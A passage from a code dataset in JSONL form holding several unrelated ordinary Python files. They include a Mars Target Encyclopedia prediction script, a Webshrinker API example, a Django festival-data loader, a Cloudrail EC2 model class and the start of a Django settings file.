"line_number": 30, "usage_type": "call"}]} +{"seq_id": "168766357", "text": "# python3\n# predict.py\n# Mars Target Encyclopedia\n# This script uses a trained Containee model to predict if a component instance is a Containee instance. \n#\n# Yuan Zhuang\n# July 30, 2021\n# Copyright notice at bottom of file.\n\nimport os, sys, argparse, torch, pickle, random, json, numpy as np\nfrom transformers import *\nfrom torch.utils.data import DataLoader\nfrom os.path import abspath, dirname, join, exists\nfrom sys import stdout\nimport numpy as np\nfrom copy import deepcopy\nfrom dataset import MyDataset, collate\nfrom model import Model\n\n# label info \ncurpath = dirname(abspath(__file__))\nupperpath = dirname(curpath)\nsys.path.append(upperpath)\n\nfrom eval import unary_eval\n\nfrom config import label2ind, ind2label,tokenizer_type\n\nexppath = dirname(dirname(dirname(curpath)))\nshared_path = join(dirname(dirname(upperpath)), 'shared')\nsys.path.insert(0, shared_path)\nfrom other_utils import add_marker_tokens\n\ntokenizer = BertTokenizerFast.from_pretrained(tokenizer_type)\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nfrom tabulate import tabulate \n\ndef analayze(pred_instances, val_gold_ins, dev_analysis_outdir):\n\n if not exists(dev_analysis_outdir):\n os.makedirs(dev_analysis_outdir)\n \n print(f\"saving analysis to {dev_analysis_outdir}, error and correct.txt'\")\n\n with open(join(dev_analysis_outdir, \"error.txt\"), \"w\") as f:\n for ins in sorted(pred_instances, key = lambda x: (x.doc_id, x.sentid)):\n if ins.relation_label != ins.pred_relation_label:\n f.write(f\"DOC: {ins.doc_id}\\nSENT: {' '.join(ins.sent_toks)}\\nTEXT: {ins.text}\\nINPUTIDS: {' '.join(tokenizer.convert_ids_to_tokens(ins.input_ids))}\\nHEAD:{tokenizer.convert_ids_to_tokens(ins.input_ids)[ins.bert_start_idx]}\\nPRED: {ins.pred_relation_label}, LABEL: {ins.relation_label}\\nSCORE: {[f'{s*100:.2f}' for s in ins.pred_score]}\\n\\n\")\n\n with open(join(dev_analysis_outdir, \"correct.txt\"), \"w\") as f:\n for ins in sorted(pred_instances, key = lambda x: (x.doc_id, x.sentid)):\n if ins.relation_label == ins.pred_relation_label and ins.pred_relation_label != \"O\":\n f.write(f\"DOC: {ins.doc_id}\\nSENT: {' '.join(ins.sent_toks)}\\nTEXT: {ins.text}\\nPRED: {ins.pred_relation_label}, LABEL: {ins.relation_label}\\n\\n\")\n\ndef eval_and_save(model, val_dataloader, val_gold_ins, best_f1, args, label_to_eval = \"Contains\", tuple_level = False, save_prediction = False, use_all_yes = 0): \n\n \"\"\"\n Evaluate a trained model over validation set and save if achieves better performance \n\n Args:\n model: \n a trained model \n val_dataloader:\n a dataloder that contains extracted instances from validation files to predict \n val_gold_ins:\n a list of gold instances from validation files\n best_f1:\n previous best F1 score \n args:\n argument instance \n label_to_eval:\n type of relation to extract (e.g. Contains)\n tupe_level:\n a boolean to indicate whether the evaluation is tuple-level or instance-level \n save_prediction:\n a boolean to indicate whether to save predictions \n use_all_yes:\n a boolean to indicate whether to assign Contains to all extracted instances. This is the all-yes baseline. \n\n \"\"\"\n\n print(\"\\n\\n---------------eval------------------\\n\")\n pred_instances = predict(model, val_dataloader)\n\n if use_all_yes:\n for ins in pred_instances:\n ins.pred_relation_label = 'Contains'\n\n precision, recall, f1 = unary_eval(pred_instances, val_gold_ins, label_to_eval, tuple_level = tuple_level)\n\n score_str = f\"precision: {precision*100:.2f}, recall: {recall*100:.2f}, f1: {f1*100:.2f}\\n\"\n\n print(f\"------------- Evaluation ------------\\n\\n{score_str}\\n\")\n\n if args.analyze_dev:\n analayze(pred_instances, val_gold_ins, args.outdir)\n\n if save_prediction:\n if not exists(args.outdir):\n os.makedirs(args.outdir)\n\n print(f\"saving prediction to {join(args.outdir, f'components.pred')}\")\n with open(join(args.outdir, f\"components.pred\"), \"wb\") as f:\n pickle.dump(pred_instances, f)\n \n\n return best_f1\n\n\n\ndef predict(model, dataloader):\n \"\"\"\n This function uses a trained Containee model to predict whether a component is a Containee instance. \n\n Args:\n model: \n a trained model \n dataloader:\n a dataloader that contains component instances to predict labels for \n \"\"\"\n\n model = model.to(device)\n model.eval()\n \n pred_instances = []\n soft = torch.nn.Softmax(dim = 1)\n\n # ids is for tracking \n with torch.no_grad(): \n for i, item in enumerate(dataloader):\n \n stdout.write(f\"\\rpredicting {i}/{len(dataloader)}\")\n stdout.flush()\n\n logits =model.forward(item)\n scores = soft(logits).cpu().numpy()\n y_preds = np.argmax(scores,1)\n\n\n for ins, y_pred, score in zip(item[\"instances\"], y_preds, scores):\n if score[0] > 0.5:\n y_pred = 0\n else:\n y_pred = 1\n ins.pred_relation_label = ind2label[y_pred]\n ins.pred_score = score\n pred_instances.append(ins)\n\n return pred_instances\n\nif __name__ == \"__main__\":\n\n\n \"\"\" ================= parse =============== \"\"\"\n parser = argparse.ArgumentParser()\n \n parser.add_argument('-use_all_yes', default = 0, type = int, choices = [0,1], help = \"whether to run the all yes baseline, which assigns Contains to all instances\")\n\n parser.add_argument(\"--modelfile\", required = True, help = 'trained model file')\n parser.add_argument(\"--test_dir\", required = True, help = 'directory where testing instances are stored')\n parser.add_argument(\"--outdir\", default = \"./temp/prediction\", help = \"where to save the model to\")\n parser.add_argument(\"--dropout\", type = float, default = 0)\n parser.add_argument(\"--analyze_dev\", default = 0, choices = [0, 1], type = int, help = 'whether to do analysis of the model predictions')\n\n args = parser.parse_args()\n\n ners = ['Component']\n\n add_marker_tokens(tokenizer, ners)\n\n print(\"Loading data \")\n test_file = join(args.test_dir, \n \"spanins.pkl\")\n\n with open(test_file, \"rb\") as f:\n test_ins = pickle.load(f)\n\n with open(join(args.test_dir, \"gold_spanins.pkl\"), \"rb\") as f:\n test_gold_ins = pickle.load(f)\n\n \"\"\" ================ make dataset ================ \"\"\"\n print(\"Making dataset ... \")\n test_dataset = MyDataset(test_ins)\n\n \"\"\" ================ make dataloader ============= \"\"\"\n print(\"Making data loader ...\")\n test_dataloader = DataLoader(test_dataset, batch_size = 10, collate_fn = collate)\n \"\"\" ================ model ================ \"\"\"\n\n model = Model(tokenizer,args)\n model.load_state_dict(torch.load(args.modelfile))\n\n print(\"Instance Level Evaluation: \")\n eval_and_save(model, test_dataloader, test_gold_ins, None, args, tuple_level = False, save_prediction = False)\n \n print(\"Tuple Level Evaluation:\")\n eval_and_save(model, test_dataloader, test_gold_ins, None, args, tuple_level = True, save_prediction = True)\n \n if args.use_all_yes:\n print(\"All yes baseline\")\n print(\"Tuple Level: \")\n eval_and_save(model, test_dataloader, test_gold_ins, None, args, tuple_level = True, save_prediction = False, use_all_yes = True)\n print(\"Instance Level:\")\n eval_and_save(model, test_dataloader, test_gold_ins, None, args, tuple_level = False, save_prediction = False, use_all_yes = True)\n\n# Copyright 2021, by the California Institute of Technology. ALL\n# RIGHTS RESERVED. United States Government Sponsorship\n# acknowledged. Any commercial use must be negotiated with the Office\n# of Technology Transfer at the California Institute of Technology.\n#\n# This software may be subject to U.S. export control laws and\n# regulations. By accepting this document, the user agrees to comply\n# with all applicable U.S. export laws and regulations. User has the\n# responsibility to obtain export licenses, or other export authority\n# as may be required before exporting such information to foreign\n# countries or providing access to foreign persons.\n\n\n\n ", "sub_path": "experiments/within-sentence-experiments/unary_classifiers/containee/predict.py", "file_name": "predict.py", "file_ext": "py", "file_size_in_byte": 8374, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "os.path.dirname", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 22, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 23, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 30, "usage_type": "call"}, {"api_name": "sys.path.insert", "line_number": 31, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "config.tokenizer_type", "line_number": 34, "usage_type": "argument"}, {"api_name": "torch.device", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 42, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "eval.unary_eval", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 101, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 105, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 106, "usage_type": "call"}, {"api_name": "model.to", "line_number": 124, "usage_type": "call"}, {"api_name": "model.eval", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.nn.Softmax", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 128, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 131, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 134, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 134, "usage_type": "name"}, {"api_name": "sys.stdout.flush", "line_number": 135, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 135, "usage_type": "name"}, {"api_name": "model.forward", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 139, "usage_type": "call"}, {"api_name": "config.ind2label", "line_number": 147, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 157, "usage_type": "call"}, {"api_name": "other_utils.add_marker_tokens", "line_number": 171, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 174, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 180, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 181, "usage_type": "call"}, {"api_name": "dataset.MyDataset", "line_number": 185, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 189, "usage_type": "call"}, {"api_name": "dataset.collate", "line_number": 189, "usage_type": "name"}, {"api_name": "model.Model", "line_number": 192, "usage_type": "call"}, {"api_name": "model.load_state_dict", "line_number": 193, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 193, "usage_type": "call"}]} +{"seq_id": "52851579", "text": "##########################################################################################\n# NOTE: If you are using Python 2.7.6 you might run into an issue\n# with making API calls using the requests library.\n# For a workaround, see:\n# http://stackoverflow.com/questions/31649390/python-requests-ssl-handshake-failure\n##########################################################################################\n\nimport requests\nimport json\nfrom base64 import urlsafe_b64encode\n\ntry:\n from urllib import urlencode\nexcept ImportError:\n from urllib.parse import urlencode\n\ntarget_website = b\"\"\n\nkey = \"\"\nsecret_key = \"\"\n\nparams = {\n \"limit\": 10\n}\n\napi_url = \"https://api.webshrinker.com/hosts/v3/{}/links/inbound?{}\".format(urlsafe_b64encode(target_website).decode('utf-8'), urlencode(params, True))\n\nresponse = requests.get(api_url, auth=(key, secret_key))\nstatus_code = response.status_code\ndata = response.json()\n\nif status_code == 200:\n # Do something with the JSON response\n print(json.dumps(data, indent=4))\nelif status_code == 400:\n # Bad or malformed HTTP request\n print(\"Bad or malformed HTTP request\")\n print(data)\nelif status_code == 401:\n # Unauthorized\n print(\"Unauthorized - check your access and secret key permissions\")\n print(data)\nelif status_code == 402:\n # Request limit reached\n print(\"Account request limit reached\")\n print(data)\nelse:\n # General error occurred\n print(\"A general error occurred, try the request again\")\n", "sub_path": "hosts/python/backlinks_or_outbound_links_using_requests.py", "file_name": "backlinks_or_outbound_links_using_requests.py", "file_ext": "py", "file_size_in_byte": 1601, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "base64.urlsafe_b64encode", "line_number": 26, "usage_type": "call"}, {"api_name": "urllib.parse.urlencode", "line_number": 26, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 28, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "61486495", "text": "import os\nimport django\nimport django.db.utils\nfrom django.core.exceptions import ObjectDoesNotExist\nimport spotipy\n# django project has to be set before importing from the project's apps\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"LearnTheLineup.settings\")\ndjango.setup()\nfrom festivals.models import Festival, Day\nfrom artists.models import Artist, Song\n\n\ndef readFromText():\n \"\"\"Reads from text files containing festival lineups and adds festivals and objects to the database.\"\"\"\n festNames = [\n \"Coachella 2018\",\n ]\n for festName in festNames:\n try:\n filename = \"festivals/static/festivals/\" + festName + \".txt\"\n file = open(filename, mode='r')\n fest = Festival(name=festName)\n fest.save()\n\n dayCount = 1\n firstDay = Day(day=dayCount, festName=festName)\n firstDay.save()\n fest.allArtists.add(firstDay)\n fest.save()\n coachellaOrder = 0\n\n while True:\n line = file.readline()\n if not line: # EOF\n break\n line = line.strip()\n if not line: # blank line indicates separate day\n dayCount += 1\n nextDay = Day(day=dayCount, festName=festName)\n nextDay.save()\n fest.allArtists.add(nextDay)\n fest.length = fest.length + 1\n fest.save()\n coachellaOrder = 0\n\n else:\n coachellaOrder += 1\n try:\n a = Artist(name=line)\n a.coachellaOrder = coachellaOrder\n a.save()\n fest.addArtist(a, dayCount)\n fest.save()\n print(a, end=\"\")\n print(\" added to \" + festName + \" day \" + str(dayCount))\n\n except django.db.utils.IntegrityError: # Artist already in database\n print(\"Duplicate artist \", end=\"\")\n try:\n result = Artist.objects.get(name=line)\n fest.addArtist(result, dayCount)\n fest.save()\n result.coachellaOrder = coachellaOrder\n print(result.name + \" added to \" + festName + \" day \" + str(dayCount))\n except ObjectDoesNotExist:\n print(line + \" could not be located\")\n file.close()\n\n except django.db.utils.IntegrityError:\n print(festName + \" already exists, skipping file\")\n except FileNotFoundError:\n print(\"festivals/static/festivals/\" + festName + \".txt not found\")\n\n\ndef searchArtistName():\n \"\"\"Looks up each artist in the database through Spotify's Web API. If the artist is found on Spotify, the artist's\n Spotify URI attribute is set.\"\"\"\n artists = Artist.objects.all()\n for artist in artists:\n artist.findSpotifyURI()\n artist.save()\n if artist.spotifyURI:\n print(artist, end=\"\")\n print(\" uri found: \", end=\"\")\n print(artist.spotifyURI)\n else:\n print(\"URI not found for \", end=\"\")\n print(artist)\n\n\ndef searchArtistAlbum():\n \"\"\"Looks up artist albums for each artist in the database that has a Spotify URI. If albums are found, the\n artist's most recent album URI is set.\"\"\"\n artists = Artist.objects.all()\n for artist in artists:\n try:\n artist.findRecentAlbum()\n artist.save()\n except spotipy.client.SpotifyException:\n print(\"Too many albums under \", end=\"\")\n print(artist)\n\n if artist.recentAlbum:\n print(artist, end=\"\")\n print(\" album uri found: \", end=\"\")\n print(artist.recentAlbum)\n else:\n print(\"No album uri found for \", end=\"\")\n print(artist)\n\n\ndef searchSongs():\n \"\"\"Looks up the most popular songs for each artist in the database that has a Spotify URI (10 songs max). If songs\n are found, their URIs are added to the artist's top songs attribute.\"\"\"\n artists = Artist.objects.all()\n for artist in artists:\n artist.findSongs()\n artist.save()\n if artist.topSongs.all():\n print(str(artist) + \" top \" + str(len(artist.topSongs.all())) + \" song uris found\")\n else:\n print(\"No top song uri found for\", artist)\n if artist.setlistSongs.all():\n print(str(artist) + \" \" + str(len(artist.setlistSongs.all())) + \" setlist song uris found\")\n else:\n print(\"No recent setlist found for\", artist)\n\n if artist.recentAlbumSongs.all():\n print(str(artist) + \" \" + str(len(artist.recentAlbumSongs.all())) + \" recent album song uris found\")\n else:\n print(\"No recent album uri found for\", artist)\n\n\ndef searchGenres():\n \"\"\"Looks up genres for each artist in the database that has a Spotify URI. If genres are found, their names are\n added to the artist's genres attribute.\"\"\"\n artists = Artist.objects.all()\n for artist in artists:\n artist.findGenres()\n artist.findImage()\n artist.save()\n if artist.genres.all():\n print(artist, end=\" \")\n print(\"found \" + str(len(artist.genres.all())) + \" genres\")\n else:\n print(\"No genre found for\", artist)\n if artist.imageURL != \"\":\n print(\"Image found for\", artist)\n else:\n print(\"No image found for\", artist)\n\ndef deleteDuplicates():\n for row in Song.objects.all():\n if Song.objects.filter(uri=row.uri).count() > 1:\n print(\"Deleted \" + row)\n row.delete()\n\n\n# readFromText()\n# searchArtistName()\n# searchArtistAlbum()\n# searchSongs()\n# searchGenres()\n\n\n# artists = Artist.objects.all()\n# for artist in artists:\n# artist.findImage()\n# artist.findGenres()\n# artist.findRecentAlbum()\n# artist.findSongs()\n# artist.save()", "sub_path": "datafill.py", "file_name": "datafill.py", "file_ext": "py", "file_size_in_byte": 6146, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "os.environ.setdefault", "line_number": 7, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.setup", "line_number": 8, "usage_type": "call"}, {"api_name": "festivals.models.Festival", "line_number": 22, "usage_type": "call"}, {"api_name": "festivals.models.Day", "line_number": 26, "usage_type": "call"}, {"api_name": "festivals.models.Day", "line_number": 39, "usage_type": "call"}, {"api_name": "artists.models.Artist", "line_number": 49, "usage_type": "call"}, {"api_name": "django.db", "line_number": 57, "usage_type": "attribute"}, {"api_name": "artists.models.Artist.objects.get", "line_number": 60, "usage_type": "call"}, {"api_name": "artists.models.Artist.objects", "line_number": 60, "usage_type": "attribute"}, {"api_name": "artists.models.Artist", "line_number": 60, "usage_type": "name"}, {"api_name": "django.core.exceptions.ObjectDoesNotExist", "line_number": 65, "usage_type": "name"}, {"api_name": "django.db", "line_number": 69, "usage_type": "attribute"}, {"api_name": "artists.models", "line_number": 78, "usage_type": "name"}, {"api_name": "artists.models.Artist.objects.all", "line_number": 78, "usage_type": "call"}, {"api_name": "artists.models.Artist.objects", "line_number": 78, "usage_type": "attribute"}, {"api_name": "artists.models.Artist", "line_number": 78, "usage_type": "name"}, {"api_name": "artists.models", "line_number": 79, "usage_type": "name"}, {"api_name": "artists.models", "line_number": 94, "usage_type": "name"}, {"api_name": "artists.models.Artist.objects.all", "line_number": 94, "usage_type": "call"}, {"api_name": "artists.models.Artist.objects", "line_number": 94, "usage_type": "attribute"}, {"api_name": "artists.models.Artist", "line_number": 94, "usage_type": "name"}, {"api_name": "artists.models", "line_number": 95, "usage_type": "name"}, {"api_name": "spotipy.client", "line_number": 99, "usage_type": "attribute"}, {"api_name": "artists.models", "line_number": 115, "usage_type": "name"}, {"api_name": "artists.models.Artist.objects.all", "line_number": 115, "usage_type": "call"}, {"api_name": "artists.models.Artist.objects", "line_number": 115, "usage_type": "attribute"}, {"api_name": "artists.models.Artist", "line_number": 115, "usage_type": "name"}, {"api_name": "artists.models", "line_number": 116, "usage_type": "name"}, {"api_name": "artists.models", "line_number": 137, "usage_type": "name"}, {"api_name": "artists.models.Artist.objects.all", "line_number": 137, "usage_type": "call"}, {"api_name": "artists.models.Artist.objects", "line_number": 137, "usage_type": "attribute"}, {"api_name": "artists.models.Artist", "line_number": 137, "usage_type": "name"}, {"api_name": "artists.models", "line_number": 138, "usage_type": "name"}, {"api_name": "artists.models.Song.objects.all", "line_number": 153, "usage_type": "call"}, {"api_name": "artists.models.Song.objects", "line_number": 153, "usage_type": "attribute"}, {"api_name": "artists.models.Song", "line_number": 153, "usage_type": "name"}, {"api_name": "artists.models.Song.objects.filter", "line_number": 154, "usage_type": "call"}, {"api_name": "artists.models.Song.objects", "line_number": 154, "usage_type": "attribute"}, {"api_name": "artists.models.Song", "line_number": 154, "usage_type": "name"}]} +{"seq_id": "591046061", "text": "import xlwt\n\nbook = xlwt.Workbook(encoding=\"utf-8\",style_compression=0)\n\nsheet = book.add_sheet(\"Sheet1\", cell_overwrite_ok=True)\n\ndata1 = 'beijing'\nsheet.write(1,0,data1)\n\nbook.save('test\\\\test_write.xlsx')", "sub_path": "test/test_write.py", "file_name": "test_write.py", "file_ext": "py", "file_size_in_byte": 207, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "xlwt.Workbook", "line_number": 3, "usage_type": "call"}]} +{"seq_id": "540280302", "text": "from __future__ import annotations\n\nfrom dataclasses import dataclass, field\nfrom enum import Enum\nfrom typing import List, Optional\n\nfrom cloudrail.knowledge.context.aws.resources.aws_client import AwsClient\nfrom cloudrail.knowledge.context.aws.resources.ec2.ec2_image import Ec2Image\nfrom cloudrail.knowledge.context.aws.resources.networking_config.network_entity import NetworkEntity\nfrom cloudrail.knowledge.context.aws.resources.networking_config.network_resource import NetworkResource\nfrom cloudrail.knowledge.context.aws.resources.service_name import AwsServiceName, AwsServiceAttributes, AwsServiceType\n\n\nclass AssociatePublicIpAddress(Enum):\n YES = 'Yes'\n NO = 'No'\n USE_SUBNET_SETTINGS = 'UseSubnetSettings'\n\n @staticmethod\n def convert_from_optional_boolean(boolean: Optional[bool]) -> AssociatePublicIpAddress:\n if boolean is None:\n return AssociatePublicIpAddress.USE_SUBNET_SETTINGS\n if boolean:\n return AssociatePublicIpAddress.YES\n return AssociatePublicIpAddress.NO\n\n\n@dataclass\nclass Ec2RawData:\n \"\"\"\n Internal implementation detail, ignore.\n \"\"\"\n subnet_id: Optional[str] = None\n private_ip_address: Optional[str] = None # Why is this singular?\n public_ip_address: Optional[str] = None\n ipv6_addresses: List[str] = field(default_factory=list)\n associate_public_ip_address: Optional[AssociatePublicIpAddress] = None\n security_groups_ids: List[str] = field(default_factory=list)\n\n\nclass Ec2Instance(NetworkEntity, AwsClient):\n \"\"\"\n Attributes:\n instance_id: The ID of the instance.\n name: The name of the EC2 instance, if set.\n network_interfaces_ids: The network interfaces attached to the\n intance.\n state: The state of the instance.\n image_id: The ID of the AMI used for EC2.\n image_data: A pointer to the Ec2Image if found.\n iam_profile_arn: The IAM profile assigned to this image, if one is assigned.\n iam_profile_id: The ID of the IAM profile.\n http_tokens: The HTTP tokens setting - optional or required.\n availability_zone: The availability zone the EC2 is in, if configured.\n instance_type: The Instance type (i.e. 'm5.8xlarge').\n ebs_optimized: Indication whether the EC2 instance has EBS optimization enabled of not.\n monitoring_enabled: Indication if the launched EC2 instance will have detailed monitoring enabled.\n \"\"\"\n def __init__(self,\n account: str,\n region: str,\n instance_id: str,\n name: str,\n network_interfaces_ids: List[str],\n state: str,\n image_id: str,\n iam_profile_name: Optional[str],\n http_tokens: str,\n availability_zone: Optional[str],\n tags: dict,\n instance_type: str,\n ebs_optimized: bool,\n monitoring_enabled: bool):\n NetworkEntity.__init__(self, name or instance_id, account, region, AwsServiceName.AWS_EC2_INSTANCE,\n AwsServiceAttributes(aws_service_type=AwsServiceType.EC2.value, region=region))\n AwsClient.__init__(self)\n self.network_resource: NetworkResource = NetworkResource()\n self.instance_id: str = instance_id\n self.network_interfaces_ids: List[str] = network_interfaces_ids\n self.state: str = state\n self.image_id: str = image_id\n self.iam_profile_name: Optional[str] = iam_profile_name\n self.http_tokens: str = http_tokens\n self.availability_zone: Optional[str] = availability_zone\n self.image_data: Optional[Ec2Image] = None\n self.raw_data: Ec2RawData = Ec2RawData()\n if tags:\n self.tags.update(tags)\n self.instance_type: str = instance_type\n self.ebs_optimized: bool = ebs_optimized\n self.monitoring_enabled: bool = monitoring_enabled\n\n def __str__(self):\n name_or_id_msg = 'Instance Name: {}'.format(\n self.name) if self.name else 'Instance Id: {}'.format(self.instance_id)\n private_ips_msg = 'Private IP(s): {}'.format(', '.join(self.network_resource.private_ip_addresses))\n public_ips_msg = 'Public IP(s): {}'.format(\n self.network_resource.public_ip_addresses) \\\n if self.network_resource.public_ip_addresses \\\n else 'Public IP(s): None'\n vpc_name_or_id_msg = 'VPC Name: {}'.format(\n self.network_resource.vpc_name) \\\n if self.network_resource.vpc_name else \\\n f'VPC Id: {self.network_resource.vpc_id}'\n\n return '{} {} {} {}'.format(name_or_id_msg, vpc_name_or_id_msg, public_ips_msg, private_ips_msg)\n\n def get_keys(self) -> List[str]:\n return [self.instance_id]\n\n def get_name(self) -> str:\n return self.name\n\n def get_id(self) -> str:\n return self.instance_id\n\n def get_extra_data(self) -> str:\n return str(self)\n\n def with_raw_data(self,\n subnet_id: Optional[str] = None,\n private_ip_address: Optional[str] = None, # Why is this singular?\n public_ip_address: Optional[str] = None,\n ipv6_addresses: List[str] = None,\n associate_public_ip_address: AssociatePublicIpAddress = None,\n security_groups_ids: List[str] = None) -> Ec2Instance:\n self.raw_data = Ec2RawData(subnet_id, private_ip_address, public_ip_address, ipv6_addresses or [],\n associate_public_ip_address, security_groups_ids or [])\n return self\n\n def get_type(self, is_plural: bool = False) -> str:\n if not is_plural:\n return 'EC2 Instance'\n else:\n return 'EC2 Instances'\n\n def get_cloud_resource_url(self) -> str:\n return '{0}ec2/v2/home?region={1}#InstanceDetails:instanceId={2}' \\\n .format(self.AWS_CONSOLE_URL, self.region, self.instance_id)\n\n def get_arn(self) -> str:\n pass\n\n @property\n def is_tagable(self) -> bool:\n return True\n", "sub_path": "cloudrail/knowledge/context/aws/resources/ec2/ec2_instance.py", "file_name": "ec2_instance.py", "file_ext": "py", "file_size_in_byte": 6228, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "enum.Enum", "line_number": 14, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 33, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 34, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 36, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 36, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 37, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 38, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 38, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 28, "usage_type": "name"}, {"api_name": "cloudrail.knowledge.context.aws.resources.networking_config.network_entity.NetworkEntity", "line_number": 41, "usage_type": "name"}, {"api_name": "cloudrail.knowledge.context.aws.resources.aws_client.AwsClient", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 64, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 67, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 69, "usage_type": "name"}, {"api_name": "cloudrail.knowledge.context.aws.resources.networking_config.network_entity.NetworkEntity.__init__", "line_number": 74, "usage_type": "call"}, {"api_name": "cloudrail.knowledge.context.aws.resources.networking_config.network_entity.NetworkEntity", "line_number": 74, "usage_type": "name"}, {"api_name": "cloudrail.knowledge.context.aws.resources.service_name.AwsServiceName.AWS_EC2_INSTANCE", "line_number": 74, "usage_type": "attribute"}, {"api_name": "cloudrail.knowledge.context.aws.resources.service_name.AwsServiceName", "line_number": 74, "usage_type": "name"}, {"api_name": "cloudrail.knowledge.context.aws.resources.service_name.AwsServiceAttributes", "line_number": 75, "usage_type": "call"}, {"api_name": "cloudrail.knowledge.context.aws.resources.service_name.AwsServiceType.EC2", "line_number": 75, "usage_type": "attribute"}, {"api_name": "cloudrail.knowledge.context.aws.resources.service_name.AwsServiceType", "line_number": 75, "usage_type": "name"}, {"api_name": "cloudrail.knowledge.context.aws.resources.aws_client.AwsClient.__init__", "line_number": 76, "usage_type": "call"}, {"api_name": "cloudrail.knowledge.context.aws.resources.aws_client.AwsClient", "line_number": 76, "usage_type": "name"}, {"api_name": "cloudrail.knowledge.context.aws.resources.networking_config.network_resource.NetworkResource", "line_number": 77, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 79, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 82, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 84, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 85, "usage_type": "name"}, {"api_name": "cloudrail.knowledge.context.aws.resources.ec2.ec2_image.Ec2Image", "line_number": 85, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 108, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 121, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 122, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 123, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 124, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 126, "usage_type": "name"}]} +{"seq_id": "43164084", "text": "# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/lucio/Projects/django-custard/custard/example/example/settings.py\n# Compiled at: 2014-07-29 05:28:08\n\"\"\"\nDjango settings for example project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\nimport sys\nsys.path.append(os.path.dirname(BASE_DIR))\nSECRET_KEY = '%gt7a3*l@a4-o3f-*v**0=jn38pvwpfrcy%a(t&4xb#6nix5&!'\nDEBUG = True\nTEMPLATE_DEBUG = True\nALLOWED_HOSTS = []\nINSTALLED_APPS = ('django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes',\n 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles',\n 'custard', 